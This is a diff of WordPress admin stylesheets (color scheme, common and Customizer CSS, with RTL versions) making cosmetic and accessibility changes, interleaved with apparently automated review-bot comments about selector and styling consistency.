@@ -229,7 +229,7 @@ textarea:focus {
229 229
 }
230 230
 
231 231
 #adminmenu div.wp-menu-image:before {
232
-  color: #f3f1f1;
232
+  color: hsl(2.1582733813deg, 7%, 95%);
233 233
 }
234 234
 
235 235
 #adminmenu a:hover,
@@ -341,7 +341,7 @@ ul#adminmenu > li.current > a.current:after {
341 341
 
342 342
 /* Admin Menu: collapse button */
343 343
 #collapse-button {
344
-  color: #f3f1f1;
344
+  color: hsl(2.1582733813deg, 7%, 95%);
345 345
 }
346 346
 
347 347
 #collapse-button:hover,
@@ -366,7 +366,7 @@ ul#adminmenu > li.current > a.current:after {
366 366
 #wpadminbar .ab-icon:before,
367 367
 #wpadminbar .ab-item:before,
368 368
 #wpadminbar .ab-item:after {
369
-  color: #f3f1f1;
369
+  color: hsl(2.1582733813deg, 7%, 95%);
370 370
 }
371 371
 
372 372
 #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item,
@@ -410,7 +410,7 @@ ul#adminmenu > li.current > a.current:after {
410 410
 
411 411
 #wpadminbar .quicklinks li .blavatar,
412 412
 #wpadminbar .menupop .menupop > .ab-item:before {
413
-  color: #f3f1f1;
413
+  color: hsl(2.1582733813deg, 7%, 95%);
414 414
 }
415 415
 
416 416
 #wpadminbar .quicklinks .menupop ul li a:hover,
@@ -445,12 +445,12 @@ ul#adminmenu > li.current > a.current:after {
445 445
 
446 446
 #wpadminbar.mobile .quicklinks .hover .ab-icon:before,
447 447
 #wpadminbar.mobile .quicklinks .hover .ab-item:before {
448
-  color: #f3f1f1;
448
+  color: hsl(2.1582733813deg, 7%, 95%);
449 449
 }
450 450
 
451 451
 /* Admin Bar: search */
452 452
 #wpadminbar #adminbarsearch:before {
453
-  color: #f3f1f1;
453
+  color: hsl(2.1582733813deg, 7%, 95%);
454 454
 }
455 455
 
456 456
 #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus {
@@ -586,7 +586,7 @@ body.more-filters-opened .more-filters:focus:before {
586 586
 
587 587
 /* Responsive Component */
588 588
 div#wp-responsive-toggle a:before {
589
-  color: #f3f1f1;
589
+  color: hsl(2.1582733813deg, 7%, 95%);
590 590
 }
591 591
 
592 592
 .wp-responsive-open div#wp-responsive-toggle a {
@@ -599,7 +599,7 @@ div#wp-responsive-toggle a:before {
599 599
 }
600 600
 
601 601
 .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before {
602
-  color: #f3f1f1;
602
+  color: hsl(2.1582733813deg, 7%, 95%);
603 603
 }
604 604
 
605 605
 /* TinyMCE */
@@ -702,4 +702,21 @@ div#wp-responsive-toggle a:before {
702 702
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
703 703
   border-bottom-color: #dd823b;
704 704
   color: #0073aa;
705
+}
706
+
707
+/* Welcome Panel */
708
+.welcome-panel {
709
+  background-color: #fbf0e7;
710
+}
711
+
712
+.welcome-panel-header-image .about-six {
713
+  fill: #dd823b;
714
+}
715
+
716
+.welcome-panel-header-image .about-zero {
717
+  fill: #cf4944;
718
+}
719
+
720
+[class*=welcome-panel-icon] {
721
+  background-color: #cf4944;
705 722
 }

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/colors/sunrise/colors-rtl.min.css


+ 26 - 9
app/wp-admin/css/colors/sunrise/colors.css

@@ -188,7 +188,7 @@ textarea:focus {
188 188
   color: #ccaf0b;
189 189
 }
190 190
 .wp-core-ui .wp-ui-text-icon {
191
-  color: #f3f1f1;
191
+  color: hsl(2.1582733813deg, 7%, 95%);
192 192
 }
193 193
 
194 194
 /* List tables */
@@ -229,7 +229,7 @@ textarea:focus {
229 229
 }
230 230
 
231 231
 #adminmenu div.wp-menu-image:before {
232
-  color: #f3f1f1;
232
+  color: hsl(2.1582733813deg, 7%, 95%);
233 233
 }
234 234
 
235 235
 #adminmenu a:hover,
@@ -341,7 +341,7 @@ ul#adminmenu > li.current > a.current:after {
341 341
 
342 342
 /* Admin Menu: collapse button */
343 343
 #collapse-button {
344
-  color: #f3f1f1;
344
+  color: hsl(2.1582733813deg, 7%, 95%);
345 345
 }
346 346
 
347 347
 #collapse-button:hover,
@@ -366,7 +366,7 @@ ul#adminmenu > li.current > a.current:after {
366 366
 #wpadminbar .ab-icon:before,
367 367
 #wpadminbar .ab-item:before,
368 368
 #wpadminbar .ab-item:after {
369
-  color: #f3f1f1;
369
+  color: hsl(2.1582733813deg, 7%, 95%);
370 370
 }
371 371
 
372 372
 #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item,
@@ -410,7 +410,7 @@ ul#adminmenu > li.current > a.current:after {
410 410
 
411 411
 #wpadminbar .quicklinks li .blavatar,
412 412
 #wpadminbar .menupop .menupop > .ab-item:before {
413
-  color: #f3f1f1;
413
+  color: hsl(2.1582733813deg, 7%, 95%);
414 414
 }
415 415
 
416 416
 #wpadminbar .quicklinks .menupop ul li a:hover,
@@ -445,12 +445,12 @@ ul#adminmenu > li.current > a.current:after {
445 445
 
446 446
 #wpadminbar.mobile .quicklinks .hover .ab-icon:before,
447 447
 #wpadminbar.mobile .quicklinks .hover .ab-item:before {
448
-  color: #f3f1f1;
448
+  color: hsl(2.1582733813deg, 7%, 95%);
449 449
 }
450 450
 
451 451
 /* Admin Bar: search */
452 452
 #wpadminbar #adminbarsearch:before {
453
-  color: #f3f1f1;
453
+  color: hsl(2.1582733813deg, 7%, 95%);
454 454
 }
455 455
 
456 456
 #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus {
@@ -586,7 +586,7 @@ body.more-filters-opened .more-filters:focus:before {
586 586
 
587 587
 /* Responsive Component */
588 588
 div#wp-responsive-toggle a:before {
589
-  color: #f3f1f1;
589
+  color: hsl(2.1582733813deg, 7%, 95%);
590 590
 }
591 591
 
592 592
 .wp-responsive-open div#wp-responsive-toggle a {
@@ -599,7 +599,7 @@ div#wp-responsive-toggle a:before {
599 599
 }
600 600
 
601 601
 .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before {
602
-  color: #f3f1f1;
602
+  color: hsl(2.1582733813deg, 7%, 95%);
603 603
 }
604 604
 
605 605
 /* TinyMCE */
@@ -702,4 +702,21 @@ div#wp-responsive-toggle a:before {
702 702
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
703 703
   border-bottom-color: #dd823b;
704 704
   color: #0073aa;
705
+}
706
+
707
+/* Welcome Panel */
708
+.welcome-panel {
709
+  background-color: #fbf0e7;
710
+}
711
+
712
+.welcome-panel-header-image .about-six {
713
+  fill: #dd823b;
714
+}
715
+
716
+.welcome-panel-header-image .about-zero {
717
+  fill: #cf4944;
718
+}
719
+
720
+[class*=welcome-panel-icon] {
721
+  background-color: #cf4944;
705 722
 }

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/colors/sunrise/colors.min.css


+ 1 - 0
app/wp-admin/css/colors/sunrise/colors.scss

@@ -1,3 +1,4 @@
1
+$scheme-name: "sunrise";
1 2
 $base-color: #cf4944;
2 3
 $highlight-color: #dd823b;
3 4
 $notification-color: #ccaf0b;

+ 22 - 25
app/wp-admin/css/common-rtl.css

@@ -271,6 +271,7 @@ a:active {
271 271
 
272 272
 a:focus,
273 273
 a:focus .media-icon img,
274
+a:focus .plugin-icon,
274 275
 .wp-person a:focus .gravatar {
275 276
 	color: #043959;
276 277
 	box-shadow:
@@ -418,7 +419,7 @@ code {
418 419
 
419 420
 kbd,
420 421
 code {
421
-	padding: 3px 5px 2px 5px;
422
+	padding: 3px 5px 2px;
422 423
 	margin: 0 1px;
423 424
 	background: #f0f0f1;
424 425
 	background: rgba(0, 0, 0, 0.07);
@@ -583,7 +584,7 @@ code {
583 584
 	font-size: 23px;
584 585
 	font-weight: 400;
585 586
 	margin: 0;
586
-	padding: 9px 0 4px 0;
587
+	padding: 9px 0 4px;
587 588
 	line-height: 1.3;
588 589
 }
589 590
 
@@ -789,7 +790,7 @@ img.emoji {
789 790
 /* @todo can we combine these into a class or use an existing dashicon one? */
790 791
 .welcome-panel .welcome-panel-close:before,
791 792
 .tagchecklist .ntdelbutton .remove-tag-icon:before,
792
-#bulk-titles div a:before,
793
+#bulk-titles .ntdelbutton:before,
793 794
 .notice-dismiss:before {
794 795
 	background: none;
795 796
 	color: #787c82;
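Review bot: changing `#bulk-titles div a:before` to `#bulk-titles .ntdelbutton:before` makes the dismiss-icon styling depend on a class instead of the element structure, so it only applies if whatever builds the `#bulk-titles` entries now emits `.ntdelbutton`. That markup change is not visible in this stylesheet diff; please confirm it ships in the same commit, otherwise the icon rule silently stops matching.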
@@ -808,10 +809,6 @@ img.emoji {
808 809
 	margin: 0;
809 810
 }
810 811
 
811
-#bulk-titles div a:before {
812
-	margin: 1px 0;
813
-}
814
-
815 812
 .tagchecklist .ntdelbutton .remove-tag-icon:before {
816 813
 	margin-right: 2px;
817 814
 	border-radius: 50%;
@@ -824,12 +821,10 @@ img.emoji {
824 821
 	outline: 0;
825 822
 }
826 823
 
827
-.welcome-panel .welcome-panel-close:hover:before,
828
-.welcome-panel .welcome-panel-close:focus:before,
829 824
 .tagchecklist .ntdelbutton:hover .remove-tag-icon:before,
830 825
 .tagchecklist .ntdelbutton:focus .remove-tag-icon:before,
831
-#bulk-titles div a:hover:before,
832
-#bulk-titles div a:focus:before {
826
+#bulk-titles .ntdelbutton:hover:before,
827
+#bulk-titles .ntdelbutton:focus:before {
833 828
 	color: #d63638;
834 829
 }
835 830
 
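Review bot: the two removed selectors, `.welcome-panel .welcome-panel-close:hover:before` and its `:focus` twin, were what gave the welcome panel's close icon the `#d63638` hover and focus colour in this rule. The base `:before` rule earlier in the file still lists `.welcome-panel .welcome-panel-close:before`, so the icon stays but loses its state change unless another rule supplies one. Worth confirming that a replacement hover and focus style exists, since keyboard users rely on the focus indication.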
@@ -884,7 +879,8 @@ hr {
884 879
 #media-items a.delete-permanently,
885 880
 #nav-menu-footer .menu-delete,
886 881
 #delete-link a.delete,
887
-a#remove-post-thumbnail {
882
+a#remove-post-thumbnail,
883
+.privacy_requests .remove-personal-data .remove-personal-data-handle {
888 884
 	color: #b32d2e;
889 885
 }
890 886
 
@@ -902,7 +898,8 @@ span.required,
902 898
 #media-items a.delete-permanently:hover,
903 899
 #nav-menu-footer .menu-delete:hover,
904 900
 #delete-link a.delete:hover,
905
-a#remove-post-thumbnail:hover {
901
+a#remove-post-thumbnail:hover,
902
+.privacy_requests .remove-personal-data .remove-personal-data-handle:hover {
906 903
 	color: #b32d2e;
907 904
 	border: none;
908 905
 }
@@ -958,7 +955,7 @@ a#remove-post-thumbnail:hover {
958 955
 }
959 956
 
960 957
 #minor-publishing-actions {
961
-	padding: 10px 10px 0 10px;
958
+	padding: 10px 10px 0;
962 959
 	text-align: left;
963 960
 }
964 961
 
@@ -1233,7 +1230,7 @@ th.action-links {
1233 1230
 
1234 1231
 .filter-group .filter-group-feature label {
1235 1232
 	display: block;
1236
-	margin: 14px 23px 14px 0px;
1233
+	margin: 14px 23px 14px 0;
1237 1234
 }
1238 1235
 
1239 1236
 .filter-drawer .buttons {
@@ -1610,7 +1607,7 @@ form.upgrade {
1610 1607
 form.upgrade .hint {
1611 1608
 	font-style: italic;
1612 1609
 	font-size: 85%;
1613
-	margin: -0.5em 0 2em 0;
1610
+	margin: -0.5em 0 2em;
1614 1611
 }
1615 1612
 
1616 1613
 .update-php .spinner {
@@ -1708,7 +1705,7 @@ p.auto-update-status {
1708 1705
 /* screen options and help tabs revert */
1709 1706
 #screen-meta {
1710 1707
 	display: none;
1711
-	margin: 0 0px -1px 20px;
1708
+	margin: 0 0 -1px 20px;
1712 1709
 	position: relative;
1713 1710
 	background-color: #fff;
1714 1711
 	border: 1px solid #c3c4c7;
@@ -1838,6 +1835,7 @@ p.auto-update-status {
1838 1835
 
1839 1836
 .metabox-prefs .screen-options .screen-per-page {
1840 1837
 	margin-left: 15px;
1838
+	padding-left: 0;
1841 1839
 }
1842 1840
 
1843 1841
 .metabox-prefs .screen-options label {
@@ -3144,7 +3142,7 @@ img {
3144 3142
 	width: 300px;
3145 3143
 }
3146 3144
 
3147
-/* Theme/Plugin Editor */
3145
+/* Theme/Plugin file editor */
3148 3146
 .alignleft h2 {
3149 3147
 	margin: 0;
3150 3148
 }
@@ -3153,7 +3151,6 @@ img {
3153 3151
 	font-family: Consolas, Monaco, monospace;
3154 3152
 	font-size: 13px;
3155 3153
 	background: #f6f7f7;
3156
-	-moz-tab-size: 4;
3157 3154
 	-o-tab-size: 4;
3158 3155
 	tab-size: 4;
3159 3156
 }
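Review bot: this hunk drops `-moz-tab-size: 4;` but leaves `-o-tab-size: 4;` beside the unprefixed `tab-size: 4;`. If the intent is to prune obsolete vendor prefixes, the `-o-` line should go as well; if older Firefox still needs covering, the `-moz-` line should stay. Either way the block should treat the two prefixes consistently.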
@@ -3197,7 +3194,7 @@ img {
3197 3194
 }
3198 3195
 
3199 3196
 /*
3200
- * Styles for Theme and Plugin editors.
3197
+ * Styles for Theme and Plugin file editors.
3201 3198
  */
3202 3199
 
3203 3200
 /* Hide collapsed items. */
@@ -3286,7 +3283,7 @@ img {
3286 3283
 .tree-folder > .current-file::before {
3287 3284
 	right: 4px;
3288 3285
 	height: 15px;
3289
-	width: 0px;
3286
+	width: 0;
3290 3287
 	border-right: none;
3291 3288
 	top: 3px;
3292 3289
 }
@@ -3381,7 +3378,7 @@ img {
3381 3378
 }
3382 3379
 
3383 3380
 #templateside li.howto {
3384
-	padding: 6px 12px 12px 12px;
3381
+	padding: 6px 12px 12px;
3385 3382
 }
3386 3383
 
3387 3384
 .theme-editor-php .highlight {
@@ -3433,7 +3430,7 @@ img {
3433 3430
 }
3434 3431
 
3435 3432
 .widget-top .widget-action .toggle-indicator:before {
3436
-	padding: 1px 0px 1px 2px;
3433
+	padding: 1px 0 1px 2px;
3437 3434
 	border-radius: 50%;
3438 3435
 }
3439 3436
 
@@ -3828,7 +3825,7 @@ img {
3828 3825
 	.wrap div.updated,
3829 3826
 	.wrap div.error,
3830 3827
 	.media-upload-form div.error {
3831
-		margin: 20px 0 10px 0;
3828
+		margin: 20px 0 10px;
3832 3829
 		padding: 5px 10px;
3833 3830
 		font-size: 14px;
3834 3831
 		line-height: 175%;
@@ -3938,7 +3935,7 @@ img {
3938 3935
 		right: -8px;
3939 3936
 	}
3940 3937
 	.tree-folder > li::before {
3941
-		top: 0px;
3938
+		top: 0;
3942 3939
 		height: 13px;
3943 3940
 	}
3944 3941
 	.tree-folder > .current-file::before {

File diff suppressed because it is too large
+ 2 - 2
app/wp-admin/css/common-rtl.min.css


+ 22 - 25
app/wp-admin/css/common.css

@@ -270,6 +270,7 @@ a:active {
270 270
 
271 271
 a:focus,
272 272
 a:focus .media-icon img,
273
+a:focus .plugin-icon,
273 274
 .wp-person a:focus .gravatar {
274 275
 	color: #043959;
275 276
 	box-shadow:
@@ -417,7 +418,7 @@ code {
417 418
 
418 419
 kbd,
419 420
 code {
420
-	padding: 3px 5px 2px 5px;
421
+	padding: 3px 5px 2px;
421 422
 	margin: 0 1px;
422 423
 	background: #f0f0f1;
423 424
 	background: rgba(0, 0, 0, 0.07);
@@ -582,7 +583,7 @@ code {
582 583
 	font-size: 23px;
583 584
 	font-weight: 400;
584 585
 	margin: 0;
585
-	padding: 9px 0 4px 0;
586
+	padding: 9px 0 4px;
586 587
 	line-height: 1.3;
587 588
 }
588 589
 
@@ -788,7 +789,7 @@ img.emoji {
788 789
 /* @todo can we combine these into a class or use an existing dashicon one? */
789 790
 .welcome-panel .welcome-panel-close:before,
790 791
 .tagchecklist .ntdelbutton .remove-tag-icon:before,
791
-#bulk-titles div a:before,
792
+#bulk-titles .ntdelbutton:before,
792 793
 .notice-dismiss:before {
793 794
 	background: none;
794 795
 	color: #787c82;
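Review bot: `#bulk-titles .ntdelbutton:before` only matches if the bulk-edit title list now renders its remove control with the `ntdelbutton` class, and that markup change is not part of this file. Confirm the template or script that builds `#bulk-titles` ships in the same commit, otherwise the icon loses the shared `background: none` and `color: #787c82` styling that `#bulk-titles div a:before` used to receive.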
@@ -807,10 +808,6 @@ img.emoji {
807 808
 	margin: 0;
808 809
 }
809 810
 
810
-#bulk-titles div a:before {
811
-	margin: 1px 0;
812
-}
813
-
814 811
 .tagchecklist .ntdelbutton .remove-tag-icon:before {
815 812
 	margin-left: 2px;
816 813
 	border-radius: 50%;
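Review bot: the deleted `#bulk-titles div a:before { margin: 1px 0; }` rule has no `.ntdelbutton` counterpart, so the renamed selector silently drops the 1px vertical margin on the remove icon. If that is intended because the new markup aligns differently, say so in the commit message; otherwise re-add the rule as `#bulk-titles .ntdelbutton:before`.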
@@ -823,12 +820,10 @@ img.emoji {
823 820
 	outline: 0;
824 821
 }
825 822
 
826
-.welcome-panel .welcome-panel-close:hover:before,
827
-.welcome-panel .welcome-panel-close:focus:before,
828 823
 .tagchecklist .ntdelbutton:hover .remove-tag-icon:before,
829 824
 .tagchecklist .ntdelbutton:focus .remove-tag-icon:before,
830
-#bulk-titles div a:hover:before,
831
-#bulk-titles div a:focus:before {
825
+#bulk-titles .ntdelbutton:hover:before,
826
+#bulk-titles .ntdelbutton:focus:before {
832 827
 	color: #d63638;
833 828
 }
834 829
 
@@ -883,7 +878,8 @@ hr {
883 878
 #media-items a.delete-permanently,
884 879
 #nav-menu-footer .menu-delete,
885 880
 #delete-link a.delete,
886
-a#remove-post-thumbnail {
881
+a#remove-post-thumbnail,
882
+.privacy_requests .remove-personal-data .remove-personal-data-handle {
887 883
 	color: #b32d2e;
888 884
 }
889 885
 
@@ -901,7 +897,8 @@ span.required,
901 897
 #media-items a.delete-permanently:hover,
902 898
 #nav-menu-footer .menu-delete:hover,
903 899
 #delete-link a.delete:hover,
904
-a#remove-post-thumbnail:hover {
900
+a#remove-post-thumbnail:hover,
901
+.privacy_requests .remove-personal-data .remove-personal-data-handle:hover {
905 902
 	color: #b32d2e;
906 903
 	border: none;
907 904
 }
@@ -957,7 +954,7 @@ a#remove-post-thumbnail:hover {
957 954
 }
958 955
 
959 956
 #minor-publishing-actions {
960
-	padding: 10px 10px 0 10px;
957
+	padding: 10px 10px 0;
961 958
 	text-align: right;
962 959
 }
963 960
 
@@ -1232,7 +1229,7 @@ th.action-links {
1232 1229
 
1233 1230
 .filter-group .filter-group-feature label {
1234 1231
 	display: block;
1235
-	margin: 14px 0px 14px 23px;
1232
+	margin: 14px 0 14px 23px;
1236 1233
 }
1237 1234
 
1238 1235
 .filter-drawer .buttons {
@@ -1609,7 +1606,7 @@ form.upgrade {
1609 1606
 form.upgrade .hint {
1610 1607
 	font-style: italic;
1611 1608
 	font-size: 85%;
1612
-	margin: -0.5em 0 2em 0;
1609
+	margin: -0.5em 0 2em;
1613 1610
 }
1614 1611
 
1615 1612
 .update-php .spinner {
@@ -1707,7 +1704,7 @@ p.auto-update-status {
1707 1704
 /* screen options and help tabs revert */
1708 1705
 #screen-meta {
1709 1706
 	display: none;
1710
-	margin: 0 20px -1px 0px;
1707
+	margin: 0 20px -1px 0;
1711 1708
 	position: relative;
1712 1709
 	background-color: #fff;
1713 1710
 	border: 1px solid #c3c4c7;
@@ -1837,6 +1834,7 @@ p.auto-update-status {
1837 1834
 
1838 1835
 .metabox-prefs .screen-options .screen-per-page {
1839 1836
 	margin-right: 15px;
1837
+	padding-right: 0;
1840 1838
 }
1841 1839
 
1842 1840
 .metabox-prefs .screen-options label {
@@ -3143,7 +3141,7 @@ img {
3143 3141
 	width: 300px;
3144 3142
 }
3145 3143
 
3146
-/* Theme/Plugin Editor */
3144
+/* Theme/Plugin file editor */
3147 3145
 .alignleft h2 {
3148 3146
 	margin: 0;
3149 3147
 }
@@ -3152,7 +3150,6 @@ img {
3152 3150
 	font-family: Consolas, Monaco, monospace;
3153 3151
 	font-size: 13px;
3154 3152
 	background: #f6f7f7;
3155
-	-moz-tab-size: 4;
3156 3153
 	-o-tab-size: 4;
3157 3154
 	tab-size: 4;
3158 3155
 }
@@ -3196,7 +3193,7 @@ img {
3196 3193
 }
3197 3194
 
3198 3195
 /*
3199
- * Styles for Theme and Plugin editors.
3196
+ * Styles for Theme and Plugin file editors.
3200 3197
  */
3201 3198
 
3202 3199
 /* Hide collapsed items. */
@@ -3285,7 +3282,7 @@ img {
3285 3282
 .tree-folder > .current-file::before {
3286 3283
 	left: 4px;
3287 3284
 	height: 15px;
3288
-	width: 0px;
3285
+	width: 0;
3289 3286
 	border-left: none;
3290 3287
 	top: 3px;
3291 3288
 }
@@ -3380,7 +3377,7 @@ img {
3380 3377
 }
3381 3378
 
3382 3379
 #templateside li.howto {
3383
-	padding: 6px 12px 12px 12px;
3380
+	padding: 6px 12px 12px;
3384 3381
 }
3385 3382
 
3386 3383
 .theme-editor-php .highlight {
@@ -3432,7 +3429,7 @@ img {
3432 3429
 }
3433 3430
 
3434 3431
 .widget-top .widget-action .toggle-indicator:before {
3435
-	padding: 1px 2px 1px 0px;
3432
+	padding: 1px 2px 1px 0;
3436 3433
 	border-radius: 50%;
3437 3434
 }
3438 3435
 
@@ -3827,7 +3824,7 @@ img {
3827 3824
 	.wrap div.updated,
3828 3825
 	.wrap div.error,
3829 3826
 	.media-upload-form div.error {
3830
-		margin: 20px 0 10px 0;
3827
+		margin: 20px 0 10px;
3831 3828
 		padding: 5px 10px;
3832 3829
 		font-size: 14px;
3833 3830
 		line-height: 175%;
@@ -3937,7 +3934,7 @@ img {
3937 3934
 		left: -8px;
3938 3935
 	}
3939 3936
 	.tree-folder > li::before {
3940
-		top: 0px;
3937
+		top: 0;
3941 3938
 		height: 13px;
3942 3939
 	}
3943 3940
 	.tree-folder > .current-file::before {

File diff suppressed because it is too large
+ 2 - 2
app/wp-admin/css/common.min.css


+ 54 - 15
app/wp-admin/css/customize-controls-rtl.css

@@ -106,6 +106,12 @@ body:not(.ready) #customize-save-button-wrapper .save {
106 106
 	height: 100%;
107 107
 }
108 108
 
109
+@media (prefers-reduced-motion: reduce) {
110
+	#customize-sidebar-outer-content {
111
+		transition: none;
112
+	}
113
+}
114
+
109 115
 #customize-theme-controls .control-section-outer {
110 116
 	display: none !important;
111 117
 }
@@ -124,6 +130,12 @@ body:not(.ready) #customize-save-button-wrapper .save {
124 130
 	transition: right .18s;
125 131
 }
126 132
 
133
+@media (prefers-reduced-motion: reduce) {
134
+	.outer-section-open .wp-full-overlay.expanded #customize-sidebar-outer-content {
135
+		transition: none;
136
+	}
137
+}
138
+
127 139
 .customize-outer-pane-parent {
128 140
 	margin: 0;
129 141
 }
@@ -538,6 +550,13 @@ body.trashing #publish-settings {
538 550
 		.15s border-color ease-in-out;
539 551
 }
540 552
 
553
+@media (prefers-reduced-motion: reduce) {
554
+	#customize-theme-controls .accordion-section-title,
555
+	#customize-outer-theme-controls .accordion-section-title {
556
+		transition: none;
557
+	}
558
+}
559
+
541 560
 #customize-controls #customize-theme-controls .customize-themes-panel .accordion-section-title {
542 561
 	color: #50575e;
543 562
 	background-color: #fff;
@@ -636,6 +655,14 @@ body.trashing #publish-settings {
636 655
 	transition: 0.18s transform cubic-bezier(0.645, 0.045, 0.355, 1); /* easeInOutCubic */
637 656
 }
638 657
 
658
+@media (prefers-reduced-motion: reduce) {
659
+	#customize-info,
660
+	#customize-theme-controls .customize-pane-parent,
661
+	#customize-theme-controls .customize-pane-child {
662
+		transition: none;
663
+	}
664
+}
665
+
639 666
 #customize-theme-controls .customize-pane-child.skip-transition {
640 667
 	transition: none;
641 668
 }
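Review bot: `transition: none` on `#customize-info`, `.customize-pane-parent` and `.customize-pane-child` means no `transitionend` event fires for these panes when the user prefers reduced motion. Check that nothing in the Customizer scripts waits on that event to finish a pane open or close; the `.customize-pane-child.skip-transition` rule just below sets the same `transition: none`, so whatever handles that case should be confirmed to handle this one too.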
@@ -717,7 +744,7 @@ body.trashing #publish-settings {
717 744
 }
718 745
 
719 746
 .customize-section-title {
720
-	margin: -12px -12px 0 -12px;
747
+	margin: -12px -12px 0;
721 748
 	border-bottom: 1px solid #dcdcde;
722 749
 	background: #fff;
723 750
 }
@@ -740,11 +767,11 @@ div.customize-section-description p:last-child {
740 767
 
741 768
 #customize-theme-controls .customize-themes-panel h3.customize-section-title:first-child {
742 769
 	border-bottom: 1px solid #dcdcde;
743
-	padding: 12px 12px 12px 12px;
770
+	padding: 12px;
744 771
 }
745 772
 
746 773
 .ios #customize-theme-controls .customize-themes-panel h3.customize-section-title:first-child {
747
-	padding: 12px 12px 13px 12px;
774
+	padding: 12px 12px 13px;
748 775
 }
749 776
 
750 777
 .customize-section-title h3,
@@ -923,7 +950,8 @@ p.customize-section-description {
923 950
 .customize-control input[type="number"],
924 951
 .customize-control input[type="search"],
925 952
 .customize-control input[type="tel"],
926
-.customize-control input[type="url"] {
953
+.customize-control input[type="url"],
954
+.customize-control input[type="range"] {
927 955
 	width: 100%;
928 956
 	margin: 0;
929 957
 }
@@ -963,7 +991,7 @@ p.customize-section-description {
963 991
 
964 992
 .customize-section-description a.external-link:after {
965 993
 	font: 16px/11px dashicons;
966
-	content: "\f310";
994
+	content: "\f504";
967 995
 	top: 3px;
968 996
 	position: relative;
969 997
 	padding-right: 3px;
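Review bot: `content: "\f504";` swaps one bare dashicons code point for another with no comment naming the glyph, so a reader cannot tell which icon the external-link marker is meant to show. Add a trailing comment with the icon name, and confirm the dashicons font bundled with this release contains `\f504`, since a missing glyph renders as an empty box after every external link.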
@@ -1114,7 +1142,7 @@ p.customize-section-description {
1114 1142
  */
1115 1143
 
1116 1144
 #customize-controls .customize-control-notifications-container { /* Scoped to #customize-controls for specificity over notification styles in common.css. */
1117
-	margin: 4px 0 8px 0;
1145
+	margin: 4px 0 8px;
1118 1146
 	padding: 0;
1119 1147
 	cursor: default;
1120 1148
 }
@@ -1127,7 +1155,7 @@ p.customize-section-description {
1127 1155
 
1128 1156
 #customize-controls .customize-control-notifications-container li.notice {
1129 1157
 	list-style: none;
1130
-	margin: 0 0 6px 0;
1158
+	margin: 0 0 6px;
1131 1159
 	padding: 9px 14px;
1132 1160
 	overflow: hidden;
1133 1161
 }
@@ -1429,7 +1457,7 @@ p.customize-section-description {
1429 1457
 }
1430 1458
 
1431 1459
 .customize-control-header .header-view:last-child {
1432
-	margin-bottom: 0px;
1460
+	margin-bottom: 0;
1433 1461
 }
1434 1462
 
1435 1463
 /* Convoluted, but 'outline' support isn't good enough yet */
@@ -1578,7 +1606,6 @@ p.customize-section-description {
1578 1606
 	font-family: Consolas, Monaco, monospace;
1579 1607
 	font-size: 12px;
1580 1608
 	padding: 6px 8px;
1581
-	-moz-tab-size: 2;
1582 1609
 	-o-tab-size: 2;
1583 1610
 	tab-size: 2;
1584 1611
 }
@@ -1665,7 +1692,7 @@ p.customize-section-description {
1665 1692
 	border-bottom: 1px solid #dcdcde;
1666 1693
 	border-right: none;
1667 1694
 	border-left: none;
1668
-	margin: 0 0 15px 0;
1695
+	margin: 0 0 15px;
1669 1696
 	padding-left: 100px; /* Space for the button */
1670 1697
 }
1671 1698
 
@@ -1706,6 +1733,12 @@ p.customize-section-description {
1706 1733
 	font-weight: 400;
1707 1734
 }
1708 1735
 
1736
+#customize-notifications-area .notification-message button.switch-to-editor {
1737
+	display: block;
1738
+	margin-top: 6px;
1739
+	font-weight: 400;
1740
+}
1741
+
1709 1742
 #customize-theme-controls .control-panel-themes > .accordion-section-title:after {
1710 1743
 	display: none;
1711 1744
 }
@@ -1724,6 +1757,12 @@ p.customize-section-description {
1724 1757
 	z-index: 20;
1725 1758
 }
1726 1759
 
1760
+@media (prefers-reduced-motion: reduce) {
1761
+	.control-panel-themes .customize-themes-full-container {
1762
+		transition: none;
1763
+	}
1764
+}
1765
+
1727 1766
 @media screen and (min-width: 1670px) {
1728 1767
 	.control-panel-themes .customize-themes-full-container {
1729 1768
 		width: 82%;
@@ -1861,7 +1900,7 @@ p.customize-section-description {
1861 1900
 }
1862 1901
 
1863 1902
 .control-panel-themes .customize-themes-notifications .notice {
1864
-	margin: 0 0 25px 0;
1903
+	margin: 0 0 25px;
1865 1904
 }
1866 1905
 
1867 1906
 .customize-themes-full-container .customize-themes-section {
@@ -1875,7 +1914,7 @@ p.customize-section-description {
1875 1914
 
1876 1915
 .control-section .customize-section-text-before {
1877 1916
 	padding: 0 15px 8px 0;
1878
-	margin: 15px 0 0 0;
1917
+	margin: 15px 0 0;
1879 1918
 	line-height: 16px;
1880 1919
 	border-bottom: 1px solid #dcdcde;
1881 1920
 	color: #50575e;
@@ -2096,7 +2135,7 @@ p.customize-section-description {
2096 2135
 		position: relative;
2097 2136
 		right: 0;
2098 2137
 		width: 100%;
2099
-		margin: 0 0 25px 0;
2138
+		margin: 0 0 25px;
2100 2139
 	}
2101 2140
 	.filter-drawer {
2102 2141
 		top: 46px;
@@ -2206,7 +2245,7 @@ p.customize-section-description {
2206 2245
 		width: 26px;
2207 2246
 		display: block;
2208 2247
 		line-height: 2.3;
2209
-		padding: 0 8px 0 8px;
2248
+		padding: 0 8px;
2210 2249
